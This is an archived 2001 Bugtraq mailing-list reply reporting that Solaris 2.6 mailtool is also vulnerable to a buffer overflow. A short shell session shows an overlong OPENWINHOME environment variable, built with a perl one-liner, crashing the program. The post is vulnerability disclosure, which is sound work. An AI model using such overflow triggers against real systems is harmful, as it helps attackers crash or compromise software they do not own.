[20814] in bugtraq
RE: [synnergy] - Solaris mailtool(1) buffer overflow vulnerability
daemon@ATHENA.MIT.EDU (SChoe)
Wed May 30 16:13:23 2001
Date: Tue, 29 May 2001 13:03:49 -1000 (HST)
From: SChoe <schoe@CheapTickets.COM>
To: <bugtraq@securityfocus.com>
Cc: <tdunlap@CheapTickets.COM>, <bhunter@CheapTickets.COM>,
<schoe@CheapTickets.COM>, <ssakata@CheapTickets.COM>
Message-ID: <Pine.GSO.4.31.0105291302520.18698-100000@payt01.svl.corp.cheaptickets.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
dethy@synnergy.net wrote:
> [possibly others]
/usr/openwin/bin/mailtool for Solaris 2.6 / SPARC is
also vulnerable to a buffer overflow.
<------------------------snip-------------------------->
bash-2.04$ uname -a
SunOS <hostname> 5.6 Generic_105181-23 sun4u sparc
bash-2.04$ export OPENWINHOME=`perl -e 'print "A"x1010'`
bash-2.04$ /usr/local/bin/mailtool
Segmentation Fault
bash-2.04$
<------------------------snap-------------------------->
+--------------------------------------------------+
| Sung J. Choe / UNIX Admin / www.CheapTickets.com |
| |
| Ph: 808/945.7439 Fax: 808/946.5993 |
:--------------------------------------------------+